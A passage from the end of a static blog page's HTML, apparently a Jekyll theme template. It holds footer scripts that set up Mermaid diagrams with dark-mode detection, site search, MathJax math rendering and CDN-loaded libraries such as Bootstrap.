mermaid.init(undefined, ".mermaid"); } } let initTheme = "default"; if ($("html[mode=dark]").length > 0 || ($("html[mode]").length == 0 && window.matchMedia("(prefers-color-scheme: dark)").matches ) ) { initTheme = "dark"; } let mermaidConf = { theme: initTheme /* <default|dark|forest|neutral> */ }; /* Markdown converts to HTML */ $("pre").has("code.language-mermaid").each(function() { let svgCode = $(this).children().html(); $(this).addClass("unloaded"); $(this).after(`<div class=\"mermaid\">${svgCode}</div>`); }); mermaid.initialize(mermaidConf); window.addEventListener("message", updateMermaid); }); </script><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script> /* see: <https://docs.mathjax.org/en/latest/options/input/tex.html#tex-options> */ MathJax = { tex: { inlineMath: [ /* start/end delimiter pairs for in-line math */ ['$','$'], ['\\(','\\)'] ], displayMath: [ /* start/end delimiter pairs for display math */ ['$$', '$$'], ['\\[', '\\]'] ] } }; </script> <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script> <script type="text/javascript" id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"> </script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script>
